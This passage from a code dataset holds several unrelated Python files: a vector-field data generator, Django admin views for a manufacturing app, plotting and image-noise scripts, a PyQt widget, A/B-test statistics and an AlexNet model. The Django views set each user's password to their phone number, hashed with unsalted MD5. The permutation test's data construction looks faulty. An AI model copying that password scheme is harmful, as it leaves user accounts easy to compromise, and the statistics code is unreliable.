Truncating to first {max_topos}.')\r\n tps = tps[:max_topos]\r\n \r\n pp = DE.get_polynomial_representation()\r\n pp = pp if pp else DE.fit_polynomial_representation()\r\n if np.isclose(v, v_pert).all(): # no perturbation\r\n pp_pert = pp\r\n else:\r\n pp_pert = DE_pert.fit_polynomial_representation(coords=coords, vectors=v_pert)\r\n \r\n pp = np.stack(pp).T.flatten()\r\n pp_pert = np.stack(pp_pert).T.flatten()\r\n \r\n \r\n fixed_pts_pert.append(fp_pert)\r\n fixed_pts.append(fp)\r\n dists_pert.append(dist_pert)\r\n dists.append(dist)\r\n vectors.append(v)\r\n vectors_pert.append(v_pert)\r\n DEs.append(DE)\r\n DEs_pert.append(DE_pert)\r\n topos.append(tps)\r\n topos_pert.append(tps)\r\n poly_params.append(pp)\r\n poly_params_pert.append(pp_pert)\r\n\r\n \r\n\r\n vectors = np.stack(vectors)\r\n vectors_pert = np.stack(vectors_pert)\r\n\r\n sand = np.stack(sand) if len(sand) else None\r\n sand_pert = np.stack(sand_pert) if len(sand_pert) else None\r\n\r\n trajs = np.stack(trajs) if len(trajs) else None\r\n trajs_pert = np.stack(trajs_pert) if len(trajs_pert) else None\r\n\r\n vectors_pert = self.noise_vectors(vectors_pert, noise_type, noise_level=noise_level)\r\n\r\n topos = np.stack(topos)\r\n topos_pert = np.stack(topos_pert)\r\n \r\n dists = np.stack(dists)\r\n dists_pert = np.stack(dists_pert)\r\n \r\n poly_params = np.stack(poly_params)\r\n poly_params_pert = np.stack(poly_params_pert)\r\n\r\n return {'params_pert': params_pert.astype('float32'), \r\n 'vectors_pert': vectors_pert, \r\n 'DEs_pert': DEs_pert, \r\n 'poly_params_pert': poly_params_pert, \r\n 'sand_pert': sand_pert,\r\n 'trajs_pert': trajs_pert, \r\n 'fixed_pts_pert': fixed_pts_pert, \r\n 'dists_pert': dists_pert, \r\n 'topos_pert': topos_pert, \r\n 'params': params.astype('float32'), \r\n 'vectors': vectors, \r\n 'DEs': DEs, \r\n 'poly_params': poly_params, \r\n 'trajs': trajs,\r\n 'sand': sand, \r\n 'fixed_pts': fixed_pts, \r\n 'dists': dists,\r\n 'topos': topos\r\n }\r\n\r\n \r\n######################################## Plotting ########################################################\r\n\r\n def plot_noised_vector_fields(self, num_samples, noise_type, noise_level, params=None, add_trajectories=False, title='', **kwargs):\r\n \"\"\"\r\n Plot original and perturbed vector fields\r\n \"\"\"\r\n _, flow_pert, DEs_pert, _, _, flow, DEs, _ = self.generate_flows(num_samples=num_samples, params=params, noise_type=noise_type, noise_level=noise_level, **kwargs)\r\n # self.plot_vector_fields(params_pert, flow_pert, params, flow, **kwargs)\r\n nrows = num_samples\r\n ncols = 2 + (add_trajectories * 2)\r\n fig, axs = plt.subplots(nrows, ncols, figsize=(10,5), tight_layout=False, constrained_layout=True)\r\n for i, (f, f_pert, DE, DE_pert) in enumerate(zip(flow, flow_pert, DEs, DEs_pert)):\r\n DE.plot_vector_field(vectors=f, ax=axs[i, 0])\r\n DE_pert.plot_vector_field(vectors=f_pert, ax=axs[i, 1 + add_trajectories])\r\n if add_trajectories:\r\n DE.plot_trajectory(vectors=f, ax=axs[i, 1])\r\n DE_pert.plot_trajectory(vectors=f_pert, ax=axs[i, 3])\r\n plt.suptitle(title)\r\n plt.show()\r\n \r\n def plot_vector_fields(self, params=None, sampler_type='uniform', add_trajectories=False, **kwargs):\r\n \"\"\"\r\n Plot vector fields of system\r\n :param params: array of params for system\r\n :param param_selection: plot extreme (minimal, intermediate and maximal bounds) param combinations\r\n :param kwargs: additional params for sampling method\r\n \"\"\"\r\n sampler = SystemFamily.get_sampler(sampler_type)\r\n params = sampler(self, 
**kwargs)\r\n num_samples = params.shape[0]\r\n skip = 1\r\n\r\n nrow = ncol = int(np.ceil(np.sqrt(num_samples)))\r\n if add_trajectories:\r\n ncol = 2\r\n nrow = num_samples\r\n skip = 2\r\n \r\n fig, axs = plt.subplots(nrow, ncol, figsize=(6*ncol, 6*nrow), tight_layout=False, constrained_layout=True)\r\n axs = axs.flatten()\r\n for i in range(num_samples):\r\n ax = axs[skip*i]\r\n model = self.generate_model(params[i, :])\r\n model.plot_vector_field(ax=ax)\r\n if add_trajectories:\r\n ax = axs[skip*i+1]\r\n model.plot_trajectory(ax=ax)\r\n \r\n plt.tight_layout()\r\n plt.show()\r\n\r\n","repo_name":"nitzanlab/time-warp-attend","sub_path":"twa/data/system_family.py","file_name":"system_family.py","file_ext":"py","file_size_in_byte":19922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
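The sampling strategies in the record above reduce to a few numpy/itertools idioms; a minimal standalone sketch of the two most-used ones (`param_ranges` here is an illustrative stand-in, not taken from any SystemFamily configuration):

import itertools
import numpy as np

param_ranges = [(-1.0, 1.0), (0.0, 2.0)]  # hypothetical 2-parameter box
rng = np.random.default_rng(0)

# params_random: one uniform draw per parameter, per sample
random_params = np.column_stack(
    [rng.uniform(lo, hi, size=4) for lo, hi in param_ranges])

# params_extreme: all 2**n corners of the box via itertools.product
corners = np.array(
    [[param_ranges[j][bit] for j, bit in enumerate(bits)]
     for bits in itertools.product([0, 1], repeat=len(param_ranges))])
print(corners)  # [[-1. 0.], [-1. 2.], [1. 0.], [1. 2.]] -> 2**2 corner combinations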
+{"seq_id":"17623784473","text":"from django.core.checks import messages\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.contrib.auth.models import User, UserManager, auth\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nimport random\nfrom user.models import Notification, User, Machine\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.contrib.auth.hashers import make_password, check_password\n# Create your views here.\n\n\n@login_required(login_url='/page/admin')\ndef dashboard(request):\n cobot = Machine.objects.filter(machine_type=\"Cobot\").count()\n machine = Machine.objects.filter(machine_type=\"Machine\").count()\n users = User.objects.count()\n notification = Notification.objects.count()\n context = {}\n context['cobot'] = cobot\n context['machine'] = machine\n context['users'] = users\n context['notification'] = notification\n context['title'] = \"Admin Dashboard\"\n return render(request, 'backend/index.html', context)\n\n\n@login_required(login_url='/page/admin')\ndef new_user(request):\n if request.method == \"POST\" and request.FILES['user_picture']:\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n user_picture = request.FILES['user_picture']\n email = request.POST['email']\n phone = request.POST['phone']\n user_category = request.POST['user_category']\n user_status = \"Active\"\n password = make_password(phone, None, 'md5')\n user = User.objects.create(\n first_name=first_name, last_name=last_name, email=email,\n user_category=user_category, phone=phone, password=password, user_picture=user_picture, user_status=user_status)\n user.save()\n\n messages.info(\n request, 'User Profile was successfully Created')\n return redirect('new_user')\n\n else:\n title = \"New User\"\n return render(request, 'backend/new-user.html', {'title': title})\n\n\n@login_required(login_url='/page/admin')\ndef all_users(request):\n title = \"All User\"\n user = User.objects.all().order_by('-id')\n paginator = Paginator(user, 20)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n return render(request, 'backend/all-users.html', {'title': title, 'user': page_obj})\n\n\n\n@login_required(login_url='/page/admin')\ndef edit_user(request, id):\n users = User.objects.get(id=id)\n if request.method == \"POST\" and request.FILES['user_picture']:\n phone = request.POST['phone']\n users.first_name = request.POST['first_name']\n users.last_name = request.POST['last_name']\n users.user_picture = request.FILES['user_picture']\n users.email = request.POST['email']\n users.password = make_password(phone, None, 'md5')\n users.user_category = request.POST['user_category']\n users.save()\n\n messages.info(\n request, 'User was Edited successful')\n return redirect('edit_user', id=users.id)\n\n else:\n title = \"Edit User\"\n return render(request, 'backend/edit-user.html', {'title': title, 'user': users})\n\n\n@login_required(login_url='/page/admin')\ndef user_status(request, id, status):\n user_id = id\n users = User.objects.get(id=id)\n users.user_status = status\n users.save()\n\n messages.info(\n request, 'User status was Edited successful')\n return redirect('all_users')\n\n@login_required(login_url='/page/admin')\ndef delete_user(request, id):\n users = User.objects.get(id=id)\n users.delete()\n return redirect('all_users')\n\n\n@login_required(login_url='/page/admin')\ndef 
new_machine(request):\n users = User.objects.filter(user_category=\"Expert\")\n worker = User.objects.filter(user_category=\"Worker\")\n serviceman = User.objects.filter(user_category=\"Serviceman\")\n if request.method == \"POST\" and request.FILES['machine_picture']:\n machine_name = request.POST['machine_name']\n machine_code = request.POST['machine_code']\n machine_picture = request.FILES['machine_picture']\n machine_expert = request.POST['machine_expert']\n machine_worker = request.POST['machine_worker']\n machine_serviceman = request.POST['machine_serviceman']\n machine_type = request.POST['machine_type']\n machine_status = \"Running\"\n\n post = Machine.objects.create(\n machine_name=machine_name, machine_code=machine_code,\n machine_expert=User.objects.get(id=int(machine_expert)), machine_worker=User.objects.get(id=int(machine_worker)), \n machine_serviceman=User.objects.get(id=int(machine_serviceman)),machine_type=machine_type, machine_picture=machine_picture, machine_status=machine_status)\n post.save()\n\n messages.info(\n request, 'Machine information was successfully Created')\n return redirect('new_machine')\n\n else:\n title = \"New Machine\"\n return render(request, 'backend/machine/new-machine.html', {'title': title, 'user': users, 'worker':worker, 'serviceman':serviceman})\n\n\n@login_required(login_url='/page/admin')\ndef all_machine(request):\n title = \"All Machines\"\n user = Machine.objects.all().order_by('-id')\n paginator = Paginator(user, 20)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n return render(request, 'backend/machine/all-machine.html', {'title': title, 'user': page_obj})\n\n\n@login_required(login_url='/page/admin')\ndef edit_machine(request, id):\n post = Machine.objects.get(id=id)\n users = User.objects.filter(user_category=\"Expert\")\n worker = User.objects.filter(user_category=\"Worker\")\n serviceman = User.objects.filter(user_category=\"Serviceman\")\n if request.method == \"POST\" and request.FILES['machine_picture']:\n machine_expert = request.POST['machine_expert']\n machine_worker = request.POST['machine_worker']\n machine_serviceman = request.POST['machine_serviceman']\n\n\n post.machine_name = request.POST['machine_name']\n post.machine_picture = request.FILES['machine_picture']\n post.machine_expert = User.objects.get(id=int(machine_expert))\n post.machine_worker = User.objects.get(id=int(machine_worker))\n post.machine_serviceman = User.objects.get(id=int(machine_serviceman))\n post.machine_type = request.POST['machine_type']\n post.save()\n\n messages.info(\n request, 'Machine was Edited successful')\n return redirect('edit_machine', id=post.id)\n\n else:\n title = \"Edit Machine\"\n return render(request, 'backend/machine/edit-machine.html', {'title': title, 'post': post, 'user': users, 'worker':worker, 'serviceman':serviceman})\n\n\n@login_required(login_url='/page/admin')\ndef delete_machine(request, id):\n users = Machine.objects.get(id=id)\n users.delete()\n return redirect('all_machine')\n\n\n@login_required(login_url='/page/admin')\ndef new_notification(request):\n machine = Machine.objects.all().order_by('-id')\n if request.method == \"POST\":\n request_type = request.POST['request']\n title = request.POST['request_title']\n description = request.POST['description']\n machine_name = request.POST['machine_name']\n not_status = \"Active\"\n user = Notification.objects.create(\n request=request_type, machine_id=Machine.objects.get(id=int(machine_name)), title=title, 
description=description,not_status=not_status)\n user.save()\n\n messages.info(\n request, 'Notification was successfully Created')\n return redirect('new_notification')\n\n else:\n title = \"New Notification\"\n return render(request, 'backend/notification/new-notification.html', {'title': title, 'machine': machine})\n\n@login_required(login_url='/page/admin')\ndef all_notification(request):\n title = \"All Notification\"\n user = Notification.objects.all().order_by('-id')\n paginator = Paginator(user, 20)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n return render(request, 'backend/notification/all-notification.html', {'title': title, 'user': page_obj})\n\n@login_required(login_url='/page/admin')\ndef notification_status(request, id, status):\n users = Notification.objects.get(id=id)\n users.not_status = status\n users.save()\n\n messages.info(\n request, 'Notification status was Edited successful')\n return redirect('all_notification')\n\n\n@login_required(login_url='/page/admin')\ndef delete_notification(request, id):\n users = Notification.objects.get(id=id)\n users.delete()\n return redirect('all_notification')\n\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n\n","repo_name":"aniebue/remote_manufacturing","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
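The list views above all share the same pagination pattern; a minimal sketch of how Django's Paginator behaves, shown with a plain list standing in for the queryset:

from django.core.paginator import Paginator

items = list(range(45))           # stand-in for User.objects.all().order_by('-id')
paginator = Paginator(items, 20)  # 20 rows per page, as in all_users/all_machine
page_obj = paginator.get_page(3)  # get_page clamps out-of-range or bad page input
print(paginator.num_pages)        # 3
print(list(page_obj))             # [40, 41, 42, 43, 44] -- the last, short page
print(page_obj.has_next())        # False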
+{"seq_id":"20937646395","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\nfrom batch_experiment import dso_filenames\n\nrmse_file1 = sys.argv[1]\nrmse_file2 = sys.argv[2]\nname_template = ''\nif len(sys.argv)>3:\n name_template = sys.argv[3]\nplot_filename = name_template + '_accumulative_plot'\n# threshold = sys.argv[2]\nrmse_results1 = pd.read_csv(rmse_file1, sep = ',', header = 0, index_col=0)\nrmse_results2 = pd.read_csv(rmse_file2, sep = ',', header = 0, index_col=0)\n# print(rmse_results)\n\n# print(rmse_results.le(float(threshold)))\n# print(rmse_results.le(float(threshold)).sum().sum())\nprint(rmse_results1[0:5])\n\naccumulative_counts1 = []\naccumulative_counts2 = []\nthresholds_range = np.arange(0,0.42,0.01)\n\n# selected_option = [0,2,4,6,8,10,12,14]\nselected_option = range(0,16)\n\n#selected_option = range(0,rmse_results1.shape[1])\nfor threshold in thresholds_range:\n count1 = rmse_results1.iloc[0:5,selected_option].le(float(threshold)).sum().sum()\n accumulative_counts1.append(count1)\n\n count2 = rmse_results2.iloc[0:5,selected_option].le(float(threshold)).sum().sum()\n accumulative_counts2.append(count2)\n\nfig, ax = plt.subplots()\nplt.plot(thresholds_range, accumulative_counts1, 'b')\nplt.plot(thresholds_range, accumulative_counts2, '-r*')\nprint('saving plots to ', plot_filename)\nplt.savefig(plot_filename)\nplt.show()\n\nprint(rmse_results2.iloc[0:5,selected_option].le(0.4).sum().sum())\n\n\n","repo_name":"amberwood31/posegraph_process_scripts","sub_path":"compare_rmse_plot.py","file_name":"compare_rmse_plot.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22494596966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 21 00:30:15 2021\n\n@author: chxy\n\"\"\"\n\nimport os\nimport os.path as osp\nimport sys\nsys.path.append('/home/ubuntu/code/mmdetection/mmdet/datasets/pipelines/noisemodel/')\n\nimport numpy as np\nfrom PIL import Image\n\nfrom process import process\nfrom unprocess import unprocess\nfrom dark_noising import *\n\n\ndef main(input_folder, output_folder, noise_type):\n if not osp.exists(output_folder):\n os.mkdir(output_folder)\n\n if noise_type == 'gaussian':\n noisemodel = NoiseModel(model='g', camera='CanonEOS5D4') # 初始化noisemodel,噪声类型为'g',标定相机为CanonEOS5D4\n elif noise_type == 'gaussian-poisson':\n noisemodel = NoiseModel(model='pg', camera='CanonEOS5D4') # 初始化noisemodel,噪声类型为'pg',标定相机为CanonEOS5D4\n elif noise_type == 'physics-based':\n noisemodel = NoiseModel(model='PGBRU', camera='CanonEOS5D4') # 初始化noisemodel,噪声类型为'PGBRU',标定相机为CanonEOS5D4\n\n for filename in sorted(os.listdir(input_folder)):\n image = Image.open(osp.join(input_folder, filename)) # 读取图像\n if image.mode != 'RGB':\n image = image.convert(\"RGB\")\n W, H = image.size\n\n # resize for mosaic in unprocessing\n image = image.resize((W // 2 * 2, H // 2 * 2)) # mosaic需要图像尺寸为偶数\n\n image = np.array(image).astype(np.float32) / 255. # 像素值归一化\n raw, metadata = unprocess(image) # unprocess成四通道raw,按RGBG排列\n\n if noise_type is None:\n # dark_raw = adjust_random_brightness(raw, s_range=(0.2, 0.4)) # 随机调整pixel强度值在s_range范围内\n dark_raw = raw\n\n else:\n noisy_raw = noisemodel(raw) # 添加噪声\n noisy_raw = np.clip(noisy_raw, 0, 1) # 取值限定0~1\n # dark_raw = adjust_random_brightness(noisy_raw, s_range=(0.2, 0.4)) # 随机调整pixel强度值在s_range范围内\n dark_raw = noisy_raw\n\n result = process(dark_raw, (W, H)) # 将四通道raw转换成三通道RGB(不进行白平衡和颜色校正),并resize保持与输入一致\n result = Image.fromarray(result)\n result.save(osp.join(output_folder, filename[:-4] + '.png')) # 保存图像\n\n\nif __name__ == \"__main__\":\n main(input_folder=r'/home/ubuntu/2TB/dataset/VOCdevkit/VOC2012/JPEGImages', # 输入文件夹路径(COCO、VOC原图)\n output_folder=r'/home/ubuntu/2TB/dataset/VOCdevkit/VOC2012/Gaussian',\n # 输出文件夹路径:unp_None, unp_gaussian, unp_gaussian-poisson, unp_physics-based\n noise_type='gaussian') # 可选噪声类型:None, 'gaussian', 'gaussian-poisson', 'physics-based'\n","repo_name":"Linwei-Chen/LIS","sub_path":"mmdetection/mmdet/datasets/pipelines/noisemodel/synthesis.py","file_name":"synthesis.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"71"}
+{"seq_id":"15539607350","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n# Personal libraries\nfrom ..inputs.SpinInput import SpinInput\n\n\nclass AttitudeWidget(QWidget):\n\t\"\"\"Widget composed of four SpinInput widgets.\n\t\n\tAllow the user to send manually attitude to the drone.\n\t\n\tInherits from QWidget.\n\t\n\tOverrides: __init__\n\t\"\"\"\n\t\n\tdef __init__(self, parent):\n\t\t\"\"\"Creates inputs.\n\t\t\n\t\tArgs:\n\t\t\tparent (QWidget): The parent widget to insert instance\n\t\t\"\"\"\n\t\t\n\t\tsuper(AttitudeWidget, self).__init__(parent)\n\t\t\n\t\t# GridLayout for main layout\n\t\tself.layout = QGridLayout()\n\t\tself.setLayout(self.layout)\n\t\t\n\t\t# Roll (deg)\n\t\tlabel = QLabel('Roll (deg):')\n\t\tself.roll = SpinInput(self, -180, 180)\n\t\tself.roll.setValue(0)\n\t\tself.layout.addWidget(label, 0, 0)\n\t\tself.layout.addWidget(self.roll, 0, 1)\n\t\t\n\t\t# Pitch (deg)\n\t\tlabel = QLabel('Pitch (deg):')\n\t\tself.pitch = SpinInput(self, -180, 180)\n\t\tself.pitch.setValue(0)\n\t\tself.layout.addWidget(label, 1, 0)\n\t\tself.layout.addWidget(self.pitch, 1, 1)\n\t\t\n\t\t# Yaw (deg)\n\t\tlabel = QLabel('Yaw (deg):')\n\t\tself.yaw = SpinInput(self, -180, 180)\n\t\tself.yaw.setValue(0)\n\t\tself.layout.addWidget(label, 2, 0)\n\t\tself.layout.addWidget(self.yaw, 2, 1)\n\t\t\n\t\t# Thrust (%)\n\t\tlabel = QLabel('Thrust (%):')\n\t\tself.thrust = SpinInput(self, 0, 100)\n\t\tself.thrust.setValue(0)\n\t\tself.layout.addWidget(label, 3, 0)\n\t\tself.layout.addWidget(self.thrust, 3, 1)\n\t\t\n\t\t# Stretch\n\t\tself.layout.setRowStretch(self.layout.rowCount(), 1)\n\t\tself.layout.setColumnStretch(self.layout.columnCount(), 1)\n\t\t\n\tdef getValues(self):\n\t\t\"\"\"Returns the current values of attitude (int tuple).\"\"\"\n\t\troll = self.roll.getValue()\n\t\tpitch = self.pitch.getValue()\n\t\tyaw = self.yaw.getValue()\n\t\tthrust = self.thrust.getValue()\n\t\t\n\t\treturn roll, pitch, yaw, thrust\n\t\t\n\tdef setValues(self, roll, pitch, yaw, thrust):\n\t\t\"\"\"Changes the values of the manual inputs.\n\t\t\n\t\tArgs:\n\t\t\troll (int): Roll trim (deg)\n\t\t\tpitch (int): Pitch trim (deg)\n\t\t\tyaw (int): Yaw trim (deg)\n\t\t\tthrust (float): Thrust trim (%)\n\t\t\"\"\"\n\t\tself.roll.setValue(int(roll))\n\t\tself.pitch.setValue(int(pitch))\n\t\tself.yaw.setValue(int(yaw))\n\t\tself.thrust.setValue(int(thrust))\n","repo_name":"Adrien4193/windshape","sub_path":"src/windshape/gui/widgets/tabs/AttitudeWidget.py","file_name":"AttitudeWidget.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73235427428","text":"import math\nimport numpy as np\nimport pandas as pd\nimport statsmodels.stats.api as sms\nimport streamlit as st\nfrom scipy.stats import norm\n\nfrom source.utils import get_alpha\nfrom source.utils import get_beta\nfrom source.utils import permutation\n\n\ndef calculate_proportions_sample(\n control_conversion,\n sensitivity,\n alternative,\n confidence_level,\n power,\n):\n treatment_conversion = control_conversion * (1 + sensitivity)\n alpha = get_alpha(confidence_level)\n\n # Cohen's h\n effect_size = sms.proportion_effectsize(control_conversion,\n treatment_conversion)\n analysis = sms.TTestIndPower()\n treatment_sample = math.ceil(analysis.solve_power(\n effect_size,\n alternative=alternative,\n alpha=alpha,\n power=power,\n ratio=1,\n ))\n control_sample = treatment_sample\n\n return control_sample, treatment_sample\n\n\ndef calculate_means_sample(\n sensitivity,\n confidence_level,\n power,\n control_ratio,\n treatment_ratio,\n df,\n):\n alpha = get_alpha(confidence_level)\n beta = get_beta(power)\n\n z_alpha = norm.ppf(1 - alpha / 2)\n z_beta = norm.ppf(1 - beta)\n a = 1 / control_ratio + 1 / treatment_ratio\n b = pow(z_alpha + z_beta, 2)\n\n std_dev = df[\"measurement\"].std()\n\n total_sample = math.ceil(a * b / pow(sensitivity / std_dev, 2))\n control_sample = math.ceil(total_sample * control_ratio)\n treatment_sample = math.ceil(total_sample * treatment_ratio)\n\n return control_sample, treatment_sample\n\n\ndef evaluate_proportions_significance(\n control_users,\n treatment_users,\n control_conversions,\n treatment_conversions,\n confidence_level,\n):\n alpha = get_alpha(confidence_level)\n control_effect = control_conversions / control_users\n treatment_effect = treatment_conversions / treatment_users\n observed_diff = treatment_effect - control_effect\n\n conversion = [0] * (control_users + treatment_users)\n conversion.extend([1] * (control_conversions + treatment_conversions))\n conversion = pd.Series(conversion)\n\n perm_diffs = []\n i = 1000\n my_bar = st.progress(0)\n for percent_complete in range(i):\n perm_diffs.append(\n permutation(\n conversion,\n control_users + control_conversions,\n treatment_users + treatment_conversions,\n )\n )\n my_bar.progress((percent_complete + 1) / i)\n\n p_value = np.mean([diff > observed_diff for diff in perm_diffs])\n\n return control_effect, treatment_effect, observed_diff, alpha, p_value\n\n\ndef evaluate_means_significance(\n confidence_level,\n df,\n):\n alpha = get_alpha(confidence_level)\n\n measurements = df[\"measurement\"]\n control_users = df[df[\"group\"] == \"control\"].shape[0]\n treatment_users = df[df[\"group\"] == \"treatment\"].shape[0]\n\n control_mean = df[df[\"group\"] == \"control\"][\"measurement\"].mean()\n treatment_mean = df[df[\"group\"] == \"treatment\"][\"measurement\"].mean()\n observed_diff = treatment_mean - control_mean\n\n perm_diffs = []\n i = 1000\n my_bar = st.progress(0)\n for percent_complete in range(i):\n perm_diffs.append(\n permutation(measurements, control_users, treatment_users)\n )\n my_bar.progress((percent_complete + 1) / i)\n\n p_value = np.mean([diff > abs(observed_diff) for diff in perm_diffs])\n\n return control_mean, treatment_mean, observed_diff, alpha, p_value\n\n","repo_name":"gabrieltempass/ab-tester","sub_path":"source/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"177428826","text":"import tensorflow as tf\n\n# https://arxiv.org/pdf/1612.01452.pdf\n\n# https://github.com/ducha-aiki/caffenet-benchmark/blob/master/batchnorm.md\n # Regarding DB before or after activation. \n # Regarding type of activation: ReLu, PReLU, RReLU...etc\n\n# ReLU intitialized HeNormal: https://arxiv.org/pdf/1502.01852.pdf\n\nclass Alexnet_bn(object):\n\n def __init__(self, scope_name, image_width = 224, image_height = 224, image_depth = 1, num_labels = 17, learning_rate = 0.05, phase=0):\n self.scope_name = scope_name\n self.learning_rate = learning_rate\n self.image_width = image_width\n self.image_height = image_height\n self.image_depth = image_depth\n self.num_labels = num_labels\n self.phase = phase # 0=inference, 1=train\n\n EPSILON = 1e-3 # For batch normalization ops\n\n ALEX_FILTER_DEPTH_1, ALEX_FILTER_DEPTH_2, ALEX_FILTER_DEPTH_3 = 96, 256, 384\n ALEX_FILTER_SIZE_1, ALEX_FILTER_SIZE_2, ALEX_FILTER_SIZE_3, ALEX_FILTER_SIZE_4 = 11, 5, 3, 3\n ALEX_NUM_HIDDEN_1, ALEX_NUM_HIDDEN_2 = 4096, 4096\n\n with tf.variable_scope(self.scope_name):\n\n # WEIGHTS AND BIASES ==========================================================================\n self.w1 = tf.get_variable(name=\"w1\", shape=[ALEX_FILTER_SIZE_1, ALEX_FILTER_SIZE_1, image_depth, ALEX_FILTER_DEPTH_1], initializer=tf.keras.initializers.he_normal())\n self.b1 = tf.get_variable(name=\"b1\", shape=[ALEX_FILTER_DEPTH_1], initializer=tf.initializers.zeros())\n\n self.w2 = tf.get_variable(name=\"w2\", shape=[ALEX_FILTER_SIZE_2, ALEX_FILTER_SIZE_2, ALEX_FILTER_DEPTH_1, ALEX_FILTER_DEPTH_2], initializer=tf.keras.initializers.he_normal())\n self.b2 = tf.get_variable(name=\"b2\", shape=[ALEX_FILTER_DEPTH_2], initializer=tf.ones_initializer())\n\n self.w3 = tf.get_variable(name=\"w3\", shape=[ALEX_FILTER_SIZE_3, ALEX_FILTER_SIZE_3, ALEX_FILTER_DEPTH_2, ALEX_FILTER_DEPTH_3], initializer=tf.keras.initializers.he_normal())\n self.b3 = tf.get_variable(name=\"b3\", shape=[ALEX_FILTER_DEPTH_3], initializer=tf.initializers.zeros())\n\n self.w4 = tf.get_variable(name=\"w4\", shape=[ALEX_FILTER_SIZE_4, ALEX_FILTER_SIZE_4, ALEX_FILTER_DEPTH_3, ALEX_FILTER_DEPTH_3], initializer=tf.keras.initializers.he_normal())\n self.b4 = tf.get_variable(name=\"b4\", shape=[ALEX_FILTER_DEPTH_3], initializer=tf.ones_initializer())\n \n self.w5 = tf.get_variable(name=\"w5\", shape=[ALEX_FILTER_SIZE_4, ALEX_FILTER_SIZE_4, ALEX_FILTER_DEPTH_3, ALEX_FILTER_DEPTH_3], initializer=tf.keras.initializers.he_normal())\n self.b5 = tf.get_variable(name=\"b5\", shape=[ALEX_FILTER_DEPTH_3], initializer=tf.initializers.zeros())\n \n self.pool_reductions = 3\n self.conv_reductions = 2\n self.no_reductions = self.pool_reductions + self.conv_reductions\n self.w6 = tf.get_variable(name=\"w6\", shape=[(self.image_width // 2**self.no_reductions)*(self.image_height // 2**self.no_reductions)*ALEX_FILTER_DEPTH_3, ALEX_NUM_HIDDEN_1], initializer=tf.keras.initializers.he_normal())\n self.b6 = tf.get_variable(name=\"b6\", shape=[ALEX_NUM_HIDDEN_1], initializer=tf.ones_initializer())\n\n self.w7 = tf.get_variable(name=\"w7\", shape=[ALEX_NUM_HIDDEN_1, ALEX_NUM_HIDDEN_2], initializer=tf.keras.initializers.he_normal())\n self.b7 = tf.get_variable(name=\"b7\", shape=[ALEX_NUM_HIDDEN_2], initializer=tf.ones_initializer())\n \n self.w8 = tf.get_variable(name=\"w8\", shape=[ALEX_NUM_HIDDEN_2, self.num_labels], initializer=tf.keras.initializers.he_normal())\n self.b8 = tf.get_variable(name=\"b8\", shape=[num_labels], initializer=tf.ones_initializer())\n\n # LAYERS 
====================================================================================\n            # Placeholders\n            self.tf_data = tf.placeholder(tf.float32, shape=(None, self.image_width, self.image_height, self.image_depth))\n            self.tf_labels = tf.placeholder(tf.float32, shape = (None, self.num_labels))\n\n            # Layer 1\n            self.layer1_conv = tf.nn.conv2d(self.tf_data, self.w1, [1, 4, 4, 1], padding='SAME')\n            self.layer1_relu = tf.nn.relu(self.layer1_conv + self.b1)\n            self.layer1_mean, self.layer1_var = tf.nn.moments(self.layer1_relu, [0,1,2])\n            self.layer1_bn = tf.nn.batch_normalization(x=self.layer1_relu, mean=self.layer1_mean, variance=self.layer1_var, offset=None, scale=None, variance_epsilon=EPSILON)\n            self.layer1_pool = tf.nn.max_pool(self.layer1_bn, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n            \n            # Layer 2\n            self.layer2_conv = tf.nn.conv2d(self.layer1_pool, self.w2, [1, 1, 1, 1], padding='SAME')\n            self.layer2_relu = tf.nn.relu(self.layer2_conv + self.b2)\n            self.layer2_mean, self.layer2_var = tf.nn.moments(self.layer2_relu, [0,1,2])\n            self.layer2_bn = tf.nn.batch_normalization(x=self.layer2_relu, mean=self.layer2_mean, variance=self.layer2_var, offset=None, scale=None, variance_epsilon=EPSILON)\n            self.layer2_pool = tf.nn.max_pool(self.layer2_bn, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n            \n            # Layer 3\n            self.layer3_conv = tf.nn.conv2d(self.layer2_pool, self.w3, [1, 1, 1, 1], padding='SAME')\n            self.layer3_relu = tf.nn.relu(self.layer3_conv + self.b3)\n            self.layer3_mean, self.layer3_var = tf.nn.moments(self.layer3_relu, [0,1,2])\n            self.layer3_bn = tf.nn.batch_normalization(x=self.layer3_relu, mean=self.layer3_mean, variance=self.layer3_var, offset=None, scale=None, variance_epsilon=EPSILON)\n            \n            # Layer 4\n            self.layer4_conv = tf.nn.conv2d(self.layer3_bn, self.w4, [1, 1, 1, 1], padding='SAME')\n            self.layer4_relu = tf.nn.relu(self.layer4_conv + self.b4)\n            self.layer4_mean, self.layer4_var = tf.nn.moments(self.layer4_relu, [0,1,2])\n            self.layer4_bn = tf.nn.batch_normalization(x=self.layer4_relu, mean=self.layer4_mean, variance=self.layer4_var, offset=None, scale=None, variance_epsilon=EPSILON)\n            \n            # Layer 5\n            self.layer5_conv = 